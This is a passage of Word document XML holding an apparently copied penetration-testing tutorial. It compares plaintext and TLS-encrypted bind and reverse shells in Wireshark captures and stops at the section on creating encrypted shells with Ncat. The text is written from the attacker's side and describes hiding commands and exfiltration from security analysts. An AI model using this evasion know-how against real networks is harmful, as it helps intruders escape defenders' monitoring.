          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>We do not need to specify the remote host’s IP address, and therefore do not have to face NAT/PAT address translation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85571E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Both bind and reverse shells can be gained through common tools such as Netcat, and as a payload alongside an exploit in exploit frameworks like Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C0AF8" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="468" w:after="0" w:line="600" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:kern w:val="36"/>
          <w:sz w:val="54"/>
          <w:szCs w:val="54"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Encrypted Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED8351" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="206" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Both bind and reverse shells communicate in </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>plaintext</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>. That means anyone can sniff the network and easily see the bidirectional communications. And what’s worse, security analysts can look at what commands you executed on the target, what files you exfiltrated or uploaded to the target, as well as figure out what you were trying to do.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD38F3E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Let’s take a look at this </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>plaintext communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B2F0B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B21185E" wp14:editId="5FB0964E">
            <wp:extent cx="19831050" cy="8896350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="Picture 2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for po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31050" cy="8896350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB87397" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1483051B" wp14:editId="01679D53">
            <wp:extent cx="19831050" cy="8896350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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for po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831050" cy="8896350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E374357" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bind shell plaintext communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F587E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>This is a very basic example, but it clearly demonstrates the insecure nature of plaintext shells. We have captured 20 packets, and following the TCP stream shows us both the commands that we executed and the output the target returned. In this case, it seems like the attacker (in red) has gained root privileges on the target (in blue), has found a .txt file containing several passwords and is attempting to exfiltrate this file by setting up a HTTP server that listens on port 443 (quick note: HTTP is another plaintext protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3292A53A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>This is exactly where </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>encrypted shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> kick in. Encrypted shells, as the name suggests, encrypt the communication, thereby disallowing intermediary sniffers to decipher what we are trying to accomplish on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED9788A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Let’s take a look at this </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>encrypted communication </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F21123" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F0B3BAF" wp14:editId="6CFDB42A">
            <wp:extent cx="20955000" cy="8001000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="24" name="Picture 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955000" cy="8001000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C883EBC" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:noProof/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BF5A3EB" wp14:editId="799E6787">
            <wp:extent cx="20955000" cy="8001000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture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for po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55000" cy="8001000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB9606" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Reverse encrypted shell encrypted communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10175B52" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>The first thing to note is the inclusion of a new protocol — TLS, or Transport Layer Security. Simply put, TLS is an improved, newer version of SSL (Secure Sockets Layer) and provides strong data encryption. We can clearly see TLS’s effects on the communication by following the TCP stream. We ran the same commands as the unencrypted shell we captured above, but we see a jumbled mess of numbers, letters and symbols! This prevents anyone other than the attacker and target from deciphering the communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B170512" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>But wait, hold on, this idea of “secure” shells seems familiar — yes! That’s because SSH, or Secure Shell, also provides an encrypted shell (except not for malicious purposes)!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A6ACA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Now let’s explore how we can actually create these encrypted shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4FACEA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="413" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="Times New Roman" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="39"/>
          <w:szCs w:val="39"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Using Ncat and SBD to Generate Encrypted Shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA94547" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="206" w:after="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>We’ve already seen how Ncat can be used to provide IP whitelisting to add security to bind shells (</w:t>
      </w:r>
      <w:hyperlink r:id="rId53" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
            <w:color w:val="0000FF"/>
            <w:spacing w:val="-1"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>, check </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Ncat Bind Shell IP Whitelisting </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Segoe UI"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>section), so now let’s look at one more security feature of Ncat, which is its ability to generate encrypted shells.</w:t>
      </w:r>
    </w:p>
